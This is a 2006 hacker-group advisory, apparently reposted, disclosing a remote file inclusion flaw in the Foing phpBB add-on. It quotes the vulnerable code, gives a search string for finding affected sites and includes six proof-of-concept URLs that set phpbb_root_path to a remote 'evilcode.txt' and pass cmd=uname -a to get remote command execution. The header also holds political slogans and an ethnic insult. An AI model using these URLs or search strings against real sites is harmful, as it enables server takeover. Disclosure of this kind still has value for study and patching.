SecurityReason - Foing Remote File Include Vulnerability [PHPBB]

Advisory Text :

# Kurdish Security Advisory

# Original Advisory :
http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-rem
ote-file.html

# Foing Remote File Include Vulnerability [PHPBB] :}

# "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz
." Abdullah Ocalan

# STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !

# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan
(at) linuxmail (dot) org [email concealed]

# Risk : High

# Class : Remote

# Script : Foing

# Script Website : http://foing.sourceforge.net/

# Version : Foing 0.7.0

0.6.0

0.5.0

0.4.0

0.3.0

0.2.0

# w0rkz : "Powered by foing 0.7.0 © 2003, 2004 Foing Group"

"Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..

# Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers,
Kurdistan Cyber Army etc..

# Special Bitch : Turkish LameRz :]

------------------------------------------------------------------------
--------

# cmd shell example:

# cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Get along at directory config.php

did you meet of ..

<?php

define('FOING_INSTALLED', true);

$phpbb_root_path = '../';

$foing_prefix = $table_prefix;

?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilco
de.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcod
e.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode
.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcod
e.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evil
code.txt?&cmd=uname -a

http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evi
lcode.txt?&cmd=uname -a